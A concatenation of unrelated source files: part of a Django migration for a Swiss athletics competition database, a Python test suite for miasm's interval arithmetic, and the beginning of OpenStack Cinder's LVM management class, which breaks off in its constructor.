('kurzname', models.CharField(unique=True, max_length=15, db_column='Kurzname')),
('name', models.CharField(max_length=40, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('seriegroesse', models.IntegerField(db_column='Seriegroesse')),
('staffellaeufer', models.IntegerField(null=True, db_column='Staffellaeufer', blank=True)),
('typ', models.IntegerField(db_column='Typ')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('strecke', models.FloatField(db_column='Strecke')),
('code', models.IntegerField(db_column='Code')),
('xomega_typ', models.IntegerField(db_column='xOMEGA_Typ')),
('aktiv', models.CharField(max_length=1)),
],
options={
'db_table': 'disziplin_fr',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DisziplinIt',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xDisziplin')),
('kurzname', models.CharField(unique=True, max_length=15, db_column='Kurzname')),
('name', models.CharField(max_length=40, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('seriegroesse', models.IntegerField(db_column='Seriegroesse')),
('staffellaeufer', models.IntegerField(null=True, db_column='Staffellaeufer', blank=True)),
('typ', models.IntegerField(db_column='Typ')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('strecke', models.FloatField(db_column='Strecke')),
('code', models.IntegerField(db_column='Code')),
('xomega_typ', models.IntegerField(db_column='xOMEGA_Typ')),
('aktiv', models.CharField(max_length=1)),
],
options={
'db_table': 'disziplin_it',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Faq',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xFaq')),
('frage', models.CharField(max_length=255, db_column='Frage')),
('antwort', models.TextField(db_column='Antwort')),
('zeigen', models.CharField(max_length=1, db_column='Zeigen')),
('postop', models.IntegerField(db_column='PosTop')),
('posleft', models.IntegerField(db_column='PosLeft')),
('height', models.IntegerField()),
('width', models.IntegerField()),
('seite', models.CharField(max_length=255, db_column='Seite')),
('sprache', models.CharField(max_length=2, db_column='Sprache')),
('farbetitel', models.CharField(max_length=6, db_column='FarbeTitel')),
('farbehg', models.CharField(max_length=6, db_column='FarbeHG')),
],
options={
'db_table': 'faq',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Hoehe',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xHoehe')),
('hoehe', models.IntegerField(db_column='Hoehe')),
('xrunde', models.IntegerField(db_column='xRunde')),
('xserie', models.IntegerField(db_column='xSerie')),
],
options={
'db_table': 'hoehe',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Kategorie',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xKategorie')),
('kurzname', models.CharField(unique=True, max_length=4, db_column='Kurzname')),
('name', models.CharField(max_length=30, db_column='Name')),
('anzeige', models.IntegerField(db_column='Anzeige')),
('alterslimite', models.IntegerField(db_column='Alterslimite')),
('code', models.CharField(max_length=4, db_column='Code')),
('geschlecht', models.CharField(max_length=1, db_column='Geschlecht')),
('aktiv', models.CharField(max_length=1)),
('ukc', models.CharField(max_length=1, db_column='UKC', blank=True)),
],
options={
'db_table': 'kategorie',
'verbose_name_plural': 'kategorien',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anmeldung',
name='kategorie',
field=models.ForeignKey(related_name='-', db_column='xKategorie', to='main.Kategorie'),
preserve_default=True,
),
migrations.CreateModel(
name='KategorieSvm',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xKategorie_svm')),
('name', models.CharField(max_length=100, db_column='Name')),
('code', models.CharField(max_length=5, db_column='Code')),
],
options={
'db_table': 'kategorie_svm',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Land',
fields=[
('xcode', models.CharField(max_length=3, serialize=False, primary_key=True, db_column='xCode')),
('name', models.CharField(max_length=100, db_column='Name')),
('sortierwert', models.IntegerField(db_column='Sortierwert')),
],
options={
'db_table': 'land',
'verbose_name_plural': 'l\xe4nder',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Layout',
fields=[
('xlayout', models.IntegerField(serialize=False, primary_key=True, db_column='xLayout')),
('typtl', models.IntegerField(db_column='TypTL')),
('texttl', models.CharField(max_length=255, db_column='TextTL')),
('bildtl', models.CharField(max_length=255, db_column='BildTL')),
('typtc', models.IntegerField(db_column='TypTC')),
('texttc', models.CharField(max_length=255, db_column='TextTC')),
('bildtc', models.CharField(max_length=255, db_column='BildTC')),
('typtr', models.IntegerField(db_column='TypTR')),
('texttr', models.CharField(max_length=255, db_column='TextTR')),
('bildtr', models.CharField(max_length=255, db_column='BildTR')),
('typbl', models.IntegerField(db_column='TypBL')),
('textbl', models.CharField(max_length=255, db_column='TextBL')),
('bildbl', models.CharField(max_length=255, db_column='BildBL')),
('typbc', models.IntegerField(db_column='TypBC')),
('textbc', models.CharField(max_length=255, db_column='TextBC')),
('bildbc', models.CharField(max_length=255, db_column='BildBC')),
('typbr', models.IntegerField(db_column='TypBR')),
('textbr', models.CharField(max_length=255, db_column='TextBR')),
('bildbr', models.CharField(max_length=255, db_column='BildBR')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
],
options={
'db_table': 'layout',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Meeting',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xMeeting')),
('name', models.CharField(max_length=60, null=True, db_column='Name')),
('ort', models.CharField(max_length=20, db_column='Ort')),
('datumvon', models.DateField(default=datetime.date(2015, 3, 3), db_column='DatumVon')),
('datumbis', models.DateField(null=True, db_column='DatumBis', blank=True)),
('nummer', models.CharField(default='', max_length=20, db_column='Nummer')),
('programmmodus', models.IntegerField(default=0, db_column='ProgrammModus', choices=[(0, 'Wettkampfb\xfcro'), (1, 'dezentral'), (2, 'dezentral mit Rangierung')])),
('online', models.CharField(default='n', max_length=1, db_column='Online', choices=[('y', True), ('n', False)])),
('organisator', models.CharField(max_length=200, db_column='Organisator')),
('zeitmessung', models.CharField(max_length=5, db_column='Zeitmessung')),
('passwort', models.CharField(max_length=50, db_column='Passwort')),
('xcontrol', models.IntegerField(default=0, db_column='xControl')),
('startgeld', models.FloatField(default=0, db_column='Startgeld')),
('startgeldreduktion', models.FloatField(default=0, db_column='StartgeldReduktion')),
('haftgeld', models.FloatField(default=0, db_column='Haftgeld')),
('saison', models.CharField(default='O', max_length=1, db_column='Saison', choices=[('I', 'Indoor'), ('O', 'Outdoor')])),
('autorangieren', models.CharField(max_length=1, db_column='AutoRangieren')),
('UBSKidsCup', models.CharField(default='n', max_length=1, db_column='UKC', choices=[('y', True), ('n', False)])),
('statuschanged', models.CharField(max_length=1, db_column='StatusChanged')),
],
options={
'db_table': 'meeting',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anmeldung',
name='meeting',
field=models.ForeignKey(related_name='anmeldungen', db_column='xMeeting', to='main.Meeting'),
preserve_default=True,
),
migrations.CreateModel(
name='OmegaTyp',
fields=[
('xomega_typ', models.IntegerField(serialize=False, primary_key=True, db_column='xOMEGA_Typ')),
('omega_name', models.CharField(max_length=15, db_column='OMEGA_Name')),
('omega_kurzname', models.CharField(max_length=4, db_column='OMEGA_Kurzname')),
],
options={
'db_table': 'omega_typ',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRegion')),
('name', models.CharField(max_length=50, db_column='Name')),
('anzeige', models.CharField(max_length=6, db_column='Anzeige')),
('sortierwert', models.IntegerField(db_column='Sortierwert')),
('ukc', models.CharField(max_length=1, db_column='UKC', blank=True)),
],
options={
'db_table': 'region',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Resultat',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xResultat')),
('leistung', models.IntegerField(db_column='Leistung')),
('info', models.CharField(max_length=5, db_column='Info')),
('punkte', models.FloatField(db_column='Punkte')),
],
options={
'db_table': 'resultat',
'verbose_name_plural': 'resultate',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Runde',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRunde')),
('datum', models.DateField(db_column='Datum')),
('startzeit', models.TimeField(db_column='Startzeit')),
('appellzeit', models.TimeField(db_column='Appellzeit')),
('stellzeit', models.TimeField(db_column='Stellzeit')),
('status', models.IntegerField(db_column='Status')),
('speakerstatus', models.IntegerField(db_column='Speakerstatus')),
('statuszeitmessung', models.IntegerField(db_column='StatusZeitmessung')),
('statusupload', models.IntegerField(db_column='StatusUpload')),
('qualifikationsieger', models.IntegerField(db_column='QualifikationSieger')),
('qualifikationleistung', models.IntegerField(db_column='QualifikationLeistung')),
('bahnen', models.IntegerField(db_column='Bahnen')),
('versuche', models.IntegerField(db_column='Versuche')),
('gruppe', models.CharField(max_length=2, db_column='Gruppe')),
('xrundentyp', models.IntegerField(null=True, db_column='xRundentyp', blank=True)),
('nurbestesresultat', models.CharField(max_length=1, db_column='nurBestesResultat')),
('statuschanged', models.CharField(max_length=1, db_column='StatusChanged')),
('endkampf', models.CharField(max_length=1, db_column='Endkampf')),
('finalisten', models.IntegerField(null=True, db_column='Finalisten', blank=True)),
('finalnach', models.IntegerField(null=True, db_column='FinalNach', blank=True)),
('drehen', models.CharField(max_length=20, db_column='Drehen', blank=True)),
('statusuploadukc', models.IntegerField(null=True, db_column='StatusUploadUKC', blank=True)),
],
options={
'db_table': 'runde',
'verbose_name_plural': 'runden',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Rundenlog',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundenlog')),
('zeit', models.DateTimeField(db_column='Zeit')),
('ereignis', models.CharField(max_length=255, db_column='Ereignis')),
('runde', models.ForeignKey(related_name='rundenlog', db_column='xRunde', to='main.Runde')),
],
options={
'db_table': 'rundenlog',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Rundenset',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('hauptrunde', models.IntegerField(default=0, db_column='Hauptrunde', choices=[(1, True), (0, False)])),
('runde', models.ForeignKey(related_name='-', db_column='xRunde', to='main.Runde')),
('meeting', models.ForeignKey(to='main.Meeting', db_column='xMeeting')),
('rundenset', models.IntegerField(default=0, db_column='xRundenset')),
],
options={
'db_table': 'rundenset',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RundentypDe',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundentyp')),
('typ', models.CharField(unique=True, max_length=2, db_column='Typ')),
('name', models.CharField(unique=True, max_length=20, db_column='Name')),
('wertung', models.IntegerField(null=True, db_column='Wertung', blank=True)),
('code', models.CharField(max_length=2, db_column='Code')),
],
options={
'db_table': 'rundentyp_de',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RundentypFr',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundentyp')),
('typ', models.CharField(unique=True, max_length=2, db_column='Typ')),
('name', models.CharField(unique=True, max_length=20, db_column='Name')),
('wertung', models.IntegerField(null=True, db_column='Wertung', blank=True)),
('code', models.CharField(max_length=2, db_column='Code')),
],
options={
'db_table': 'rundentyp_fr',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RundentypIt',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xRundentyp')),
('typ', models.CharField(unique=True, max_length=2, db_column='Typ')),
('name', models.CharField(unique=True, max_length=20, db_column='Name')),
('wertung', models.IntegerField(null=True, db_column='Wertung', blank=True)),
('code', models.CharField(max_length=2, db_column='Code')),
],
options={
'db_table': 'rundentyp_it',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Serie',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xSerie')),
('bezeichnung', models.CharField(max_length=2, db_column='Bezeichnung')),
('wind', models.CharField(max_length=5, db_column='Wind', blank=True)),
('film', models.IntegerField(null=True, db_column='Film', blank=True)),
('status', models.IntegerField(db_column='Status')),
('handgestoppt', models.IntegerField(db_column='Handgestoppt')),
('tvname', models.CharField(max_length=70, db_column='TVName', blank=True)),
('maxathlet', models.IntegerField(db_column='MaxAthlet')),
('runde', models.ForeignKey(related_name='serien', db_column='xRunde', to='main.Runde')),
('anlage', models.ForeignKey(db_column='xAnlage', blank=True, to='main.Anlage', null=True)),
],
options={
'db_table': 'serie',
'verbose_name_plural': 'serien',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Serienstart',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xSerienstart')),
('position', models.IntegerField(db_column='Position')),
('bahn', models.IntegerField(db_column='Bahn')),
('rang', models.IntegerField(db_column='Rang')),
('qualifikation', models.IntegerField(db_column='Qualifikation')),
('rundezusammen', models.IntegerField(db_column='RundeZusammen')),
('bemerkung', models.CharField(max_length=5, db_column='Bemerkung')),
('position2', models.IntegerField(db_column='Position2')),
('position3', models.IntegerField(db_column='Position3')),
('aktivathlet', models.CharField(max_length=1, db_column='AktivAthlet')),
('starthoehe', models.IntegerField(null=True, db_column='Starthoehe', blank=True)),
('serie', models.ForeignKey(related_name='serienstarts', db_column='xSerie', to='main.Serie')),
],
options={
'db_table': 'serienstart',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='resultat',
name='serienstart',
field=models.ForeignKey(related_name='resultate', db_column='xSerienstart', to='main.Serienstart'),
preserve_default=True,
),
migrations.CreateModel(
name='Stadion',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xStadion')),
('name', models.CharField(max_length=50, db_column='Name')),
('bahnen', models.IntegerField(default=6, db_column='Bahnen')),
('bahnengerade', models.IntegerField(default=6, db_column='BahnenGerade')),
('ueber1000m', models.CharField(default='n', max_length=1, db_column='Ueber1000m', choices=[('y', True), ('n', False)])),
('halle', models.CharField(default='n', max_length=1, db_column='Halle', choices=[('y', True), ('n', False)])),
],
options={
'db_table': 'stadion',
'verbose_name_plural': 'stadien',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='anlage',
name='stadion',
field=models.ForeignKey(related_name='anlagen', db_column='xStadion', to='main.Stadion'),
preserve_default=True,
),
migrations.AddField(
model_name='meeting',
name='stadion',
field=models.ForeignKey(related_name='meetings', db_column='xStadion', to='main.Stadion'),
preserve_default=True,
),
migrations.CreateModel(
name='Staffel',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xStaffel')),
('name', models.CharField(max_length=40, db_column='Name')),
('xverein', models.IntegerField(db_column='xVerein')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('xkategorie', models.IntegerField(db_column='xKategorie')),
('xteam', models.IntegerField(db_column='xTeam')),
('athleticagen', models.CharField(max_length=1, db_column='Athleticagen')),
('startnummer', models.IntegerField(db_column='Startnummer')),
],
options={
'db_table': 'staffel',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Staffelathlet',
fields=[
('xstaffelstart', models.IntegerField(serialize=False, primary_key=True, db_column='xStaffelstart')),
('xathletenstart', models.IntegerField(db_column='xAthletenstart')),
('xrunde', models.IntegerField(db_column='xRunde')),
('position', models.IntegerField(db_column='Position')),
],
options={
'db_table': 'staffelathlet',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Start',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xStart')),
('anwesend', models.IntegerField(db_column='Anwesend')),
('bestleistung', models.IntegerField(db_column='Bestleistung')),
('bezahlt', models.CharField(max_length=1, db_column='Bezahlt')),
('erstserie', models.CharField(max_length=1, db_column='Erstserie')),
('baseeffort', models.CharField(max_length=1, db_column='BaseEffort')),
('vorjahrleistung', models.IntegerField(null=True, db_column='VorjahrLeistung', blank=True)),
('gruppe', models.CharField(max_length=2, db_column='Gruppe', blank=True)),
('staffel', models.ForeignKey(db_column='xStaffel', blank=True, to='main.Staffel', null=True)),
('anmeldung', models.ForeignKey(related_name='starts', db_column='xAnmeldung', to='main.Anmeldung')),
],
options={
'db_table': 'start',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='serienstart',
name='start',
field=models.ForeignKey(related_name='serienstart', db_column='xStart', to='main.Start'),
preserve_default=True,
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xTeam')),
('name', models.CharField(max_length=30, db_column='Name')),
('athleticagen', models.CharField(max_length=1, db_column='Athleticagen')),
('xkategorie', models.IntegerField(db_column='xKategorie')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('xverein', models.IntegerField(db_column='xVerein')),
('xkategorie_svm', models.IntegerField(db_column='xKategorie_svm')),
],
options={
'db_table': 'team',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Teamsm',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xTeamsm')),
('name', models.CharField(max_length=100, db_column='Name')),
('xkategorie', models.IntegerField(db_column='xKategorie')),
('xverein', models.IntegerField(db_column='xVerein')),
('xwettkampf', models.IntegerField(db_column='xWettkampf')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('startnummer', models.IntegerField(db_column='Startnummer')),
('gruppe', models.CharField(max_length=2, db_column='Gruppe', blank=True)),
('quali', models.IntegerField(db_column='Quali')),
('leistung', models.IntegerField(db_column='Leistung')),
],
options={
'db_table': 'teamsm',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Teamsmathlet',
fields=[
('xteamsm', models.IntegerField(serialize=False, primary_key=True, db_column='xTeamsm')),
('xanmeldung', models.IntegerField(db_column='xAnmeldung')),
],
options={
'db_table': 'teamsmathlet',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Verein',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xVerein')),
('name', models.CharField(unique=True, max_length=100, db_column='Name')),
('sortierwert', models.CharField(max_length=100, db_column='Sortierwert')),
('xcode', models.CharField(max_length=30, db_column='xCode')),
('geloescht', models.IntegerField(db_column='Geloescht')),
],
options={
'db_table': 'verein',
'verbose_name_plural': 'vereine',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='athlet',
name='verein',
field=models.ForeignKey(related_name='athleten', db_column='xVerein', to='main.Verein'),
preserve_default=True,
),
migrations.CreateModel(
name='Videowand',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xVideowand')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
('x', models.IntegerField(db_column='X')),
('y', models.IntegerField(db_column='Y')),
('inhaltart', models.CharField(max_length=4, db_column='InhaltArt')),
('inhaltstatisch', models.TextField(db_column='InhaltStatisch')),
('inhaltdynamisch', models.TextField(db_column='InhaltDynamisch')),
('aktualisierung', models.IntegerField(db_column='Aktualisierung')),
('status', models.CharField(max_length=6, db_column='Status')),
('hintergrund', models.CharField(max_length=6, db_column='Hintergrund')),
('fordergrund', models.CharField(max_length=6, db_column='Fordergrund')),
('bildnr', models.IntegerField(db_column='Bildnr')),
],
options={
'db_table': 'videowand',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Wertungstabelle',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xWertungstabelle')),
('name', models.CharField(max_length=255, db_column='Name')),
],
options={
'db_table': 'wertungstabelle',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='WertungstabellePunkte',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xWertungstabelle_Punkte')),
('xwertungstabelle', models.IntegerField(db_column='xWertungstabelle')),
('xdisziplin', models.IntegerField(db_column='xDisziplin')),
('geschlecht', models.CharField(max_length=1, db_column='Geschlecht')),
('leistung', models.CharField(max_length=50, db_column='Leistung')),
('punkte', models.FloatField(db_column='Punkte')),
],
options={
'db_table': 'wertungstabelle_punkte',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Wettkampf',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xWettkampf')),
('typ', models.IntegerField(db_column='Typ', choices=[(0, 'Einzel'), (1, 'Mehrkampf')])),
('haftgeld', models.FloatField(db_column='Haftgeld')),
('startgeld', models.FloatField(db_column='Startgeld')),
('punktetabelle', models.IntegerField(db_column='Punktetabelle')),
('punkteformel', models.CharField(max_length=20, db_column='Punkteformel')),
('windmessung', models.IntegerField(db_column='Windmessung')),
('info', models.CharField(max_length=50, db_column='Info', blank=True)),
('zeitmessung', models.IntegerField(db_column='Zeitmessung')),
('zeitmessungauto', models.IntegerField(db_column='ZeitmessungAuto')),
('mehrkampfcode', models.IntegerField(db_column='Mehrkampfcode')),
('mehrkampfende', models.IntegerField(db_column='Mehrkampfende')),
('mehrkampfreihenfolge', models.IntegerField(db_column='Mehrkampfreihenfolge')),
('xkategorie_svm', models.IntegerField(db_column='xKategorie_svm')),
('onlineid', models.IntegerField(db_column='OnlineId')),
('typaenderung', models.CharField(max_length=50, db_column='TypAenderung')),
('meeting', models.ForeignKey(related_name='wettkaempfe', db_column='xMeeting', to='main.Meeting')),
('kategorie', models.ForeignKey(to='main.Kategorie', db_column='xKategorie')),
('disziplin', models.ForeignKey(to='main.DisziplinDe', db_column='xDisziplin')),
],
options={
'db_table': 'wettkampf',
'verbose_name_plural': 'wettk\xe4mpfe',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='runde',
name='wettkampf',
field=models.ForeignKey(related_name='runden', db_column='xWettkampf', to='main.Wettkampf'),
preserve_default=True,
),
migrations.AddField(
model_name='start',
name='wettkampf',
field=models.ForeignKey(related_name='starts', db_column='xWettkampf', to='main.Wettkampf'),
preserve_default=True,
),
migrations.CreateModel(
name='Zeitmessung',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xZeitmessung')),
('omega_verbindung', models.CharField(max_length=5, db_column='OMEGA_Verbindung')),
('omega_pfad', models.CharField(max_length=255, db_column='OMEGA_Pfad')),
('omega_server', models.CharField(max_length=255, db_column='OMEGA_Server')),
('omega_benutzer', models.CharField(max_length=50, db_column='OMEGA_Benutzer')),
('omega_passwort', models.CharField(max_length=50, db_column='OMEGA_Passwort')),
('omega_ftppfad', models.CharField(max_length=255, db_column='OMEGA_Ftppfad')),
('omega_sponsor', models.CharField(max_length=255, db_column='OMEGA_Sponsor')),
('alge_typ', models.CharField(max_length=20, db_column='ALGE_Typ')),
('alge_ftppfad', models.CharField(max_length=255, db_column='ALGE_Ftppfad')),
('alge_passwort', models.CharField(max_length=50, db_column='ALGE_Passwort')),
('alge_benutzer', models.CharField(max_length=50, db_column='ALGE_Benutzer')),
('alge_server', models.CharField(max_length=255, db_column='ALGE_Server')),
('alge_pfad', models.CharField(max_length=255, db_column='ALGE_Pfad')),
('alge_verbindung', models.CharField(max_length=5, db_column='ALGE_Verbindung')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
],
options={
'db_table': 'zeitmessung',
},
bases=(models.Model,),
),
migrations.AlterField(
model_name='athlet',
name='geburtstag',
field=models.DateField(null=True, db_column='Geburtstag', blank=True),
),
migrations.AlterField(
model_name='meeting',
name='datumvon',
field=models.DateField(default=datetime.date(2015, 3, 4), db_column='DatumVon'),
),
]
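# --- Hedged usage sketch (added; not part of the generated migration) ---
# Assuming a configured Django project with these models living in the 'main'
# app, the related_name values declared above chain a meeting down to its
# results roughly like this (object names such as `mtg` are hypothetical):
#
#   mtg = Meeting.objects.get(name='Beispielmeeting')
#   for anmeldung in mtg.anmeldungen.all():          # Anmeldung.meeting, related_name='anmeldungen'
#       for start in anmeldung.starts.all():         # Start.anmeldung, related_name='starts'
#           for sstart in start.serienstart.all():   # Serienstart.start, related_name='serienstart'
#               print(sstart.resultate.all())        # Resultat.serienstart, related_name='resultate'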
|
gpl-2.0
|
amohanta/miasm
|
test/core/interval.py
|
7
|
3822
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from miasm2.core.interval import *
from random import randint
from pdb import pm
i1 = interval([(1, 3)])
i2 = interval([(2, 5)])
i3 = interval([(3, 5)])
i4 = interval([(5, 8)])
i5 = interval([(1, 5)])
i6 = interval([(1, 3), (5, 8)])
i7 = interval([(2, 8)])
i8 = interval([(1, 8)])
i9 = interval([(4, 5)])
i10 = interval([(1, 1)])
i11 = interval([(1, 2)])
i12 = interval([(2, 2)])
i13 = interval([(2, 4)])
i14 = interval([(0, 1), (3, 5), (7, 10)])
i15 = interval([(0, 12)])
i16 = interval([(2, 8)])
i_empty = interval()
assert(repr(i_empty) == '[]')
assert(interval(i1) == i1)
i1.cannon()
i1.cannon()
assert(cmp_interval(i1.intervals[0], i2.intervals[0]) == INT_JOIN)
assert(cmp_interval(i1.intervals[0], i3.intervals[0]) == INT_JOIN)
assert(cmp_interval(i1.intervals[0], i4.intervals[0]) == INT_DISJOIN)
assert(cmp_interval(i2.intervals[0], i3.intervals[0]) == INT_B_IN_A)
assert(cmp_interval(i3.intervals[0], i2.intervals[0]) == INT_A_IN_B)
assert(cmp_interval(i1.intervals[0], i1.intervals[0]) == INT_EQ)
assert(cmp_interval(i1.intervals[0], i9.intervals[0]) == INT_JOIN_AB)
assert(cmp_interval(i9.intervals[0], i1.intervals[0]) == INT_JOIN_BA)
assert((i1 in i2) is False)
assert((i2 in i1) is False)
assert((i1 in i3) is False)
assert((i2 in i3) is False)
assert((i3 in i2))
assert((i2 in i3) is False)
assert((i3 in i14))
assert(interval.cannon_list(i1.intervals) == i1.intervals)
assert(i1 + i2 == i5)
assert(i1 + i3 == i5)
assert(i1 + i4 == i6)
assert(i2 + i3 == i2)
assert(i2 + i4 == i7)
assert(i1 + i2 + i4 == i8)
assert(i1 - i2 == i10)
assert(i1 - i3 == i11)
assert(i1 - i4 == i1)
assert(i2 - i3 == i12)
assert(i2 - i4 == i13)
assert(i8 - i1 == interval([(4, 8)]))
assert(i8 - i2 == interval([(1, 1), (6, 8)]))
assert(i10 + i12 == i11)
assert(i1 - i1 == interval())
assert(i6 - i6 == interval())
assert(i6 - i6 - i1 == interval())
assert(i1 - i10 == interval([(2, 3)]))
assert(i1 & i1 == i1)
assert(i1 & i2 == interval([(2, 3)]))
assert(i1 & i3 == interval([(3, 3)]))
assert(i3 & i1 == interval([(3, 3)]))
assert(i1 & i4 == interval([]))
assert(i4 & i1 == interval([]))
assert(i1 & i5 == i1)
assert(i5 & i1 == i1)
assert(i1 & i6 == i1)
assert(i5 & i13 == i13)
assert(i6 & i6 == i6)
assert(i14 & i15 == i14)
assert(i15 & i14 == i14)
assert(i14 & i16 == interval([(3, 5), (7, 8)]))
x1 = [(7, 87), (76, 143), (94, 129), (79, 89), (46, 100)]
assert(interval(x1) == interval([(7, 143)]))
x2 = [(11, 16), (35, 74), (18, 114), (91, 188), (3, 75)]
assert(interval(x2) == interval([(3, 188)]))
i1.hull()
i1.show(dry_run=True)
assert(i_empty.hull() == (None, None))
def gen_random_interval(l=100):
r = []
for j in xrange(5):
a = randint(0, l)
b = a + randint(0, l)
r.append((a, b))
return r
def check_add(r1, r2):
i_sum = interval(r1) + interval(r2)
for a, b in r1 + r2:
for i in xrange(a, b + 1):
assert(i in i_sum)
def check_sub(r1, r2):
i1 = interval(r1)
i2 = interval(r2)
i_sub = i1 - i2
for a, b in r1:
for i in xrange(a, b + 1):
if i in i2:
assert(i not in i_sub)
else:
assert(i in i_sub)
def check_and(r1, r2):
i1 = interval(r1)
i2 = interval(r2)
i_and = i1 & i2
for a, b in r1:
for i in xrange(a, b + 1):
if i in i2:
assert(i in i_and)
else:
assert(i not in i_and)
for i in xrange(1000):
r1 = gen_random_interval()
r2 = gen_random_interval()
r3 = gen_random_interval()
check_add(r1, r2)
check_sub(r1, r2)
check_and(r1, r2)
a = interval(r1)
b = interval(r2)
c = interval(r3)
assert((a & b) - c == a & (b - c) == (a - c) & (b - c))
assert(a - (b & c) == (a - b) + (a - c))
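# Hedged additions (not in the original test): construction canonicalizes
# overlapping ranges, as the x1/x2 cases above already show, so argument
# order should not matter, and integer membership should follow the joined
# interval.
assert(interval([(1, 3), (2, 5)]) == interval([(2, 5), (1, 3)]) == i5)
assert(2 in i5)
assert(6 not in i5)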
|
gpl-2.0
|
maelnor/cinder
|
cinder/brick/local_dev/lvm.py
|
1
|
13620
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
LVM class for performing LVM operations.
"""
import math
import re
from itertools import izip
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils as putils
LOG = logging.getLogger(__name__)
class VolumeGroupNotFound(Exception):
def __init__(self, vg_name):
message = (_('Unable to find Volume Group: %s') % vg_name)
super(VolumeGroupNotFound, self).__init__(message)
class VolumeGroupCreationFailed(Exception):
def __init__(self, vg_name):
message = (_('Failed to create Volume Group: %s') % vg_name)
super(VolumeGroupCreationFailed, self).__init__(message)
class LVM(object):
"""LVM object to enable various LVM related operations."""
def __init__(self,
vg_name,
create_vg=False,
physical_volumes=None,
lvm_type='default',
executor=putils.execute):
"""Initialize the LVM object.
The LVM object is based on an LVM VolumeGroup, one instantiation
for each VolumeGroup you have/use.
:param vg_name: Name of existing VG or VG to create
:param create_vg: Indicates the VG doesn't exist
and we want to create it
:param physical_volumes: List of PVs to build VG on
:param lvm_type: 'default' or 'thin'; 'thin' also creates/uses a thin pool
:param executor: execute wrapper used to run commands (default: putils.execute)
"""
self.vg_name = vg_name
self.pv_list = []
self.lv_list = []
self.vg_size = 0
self.vg_free_space = 0
self.vg_lv_count = 0
self.vg_uuid = None
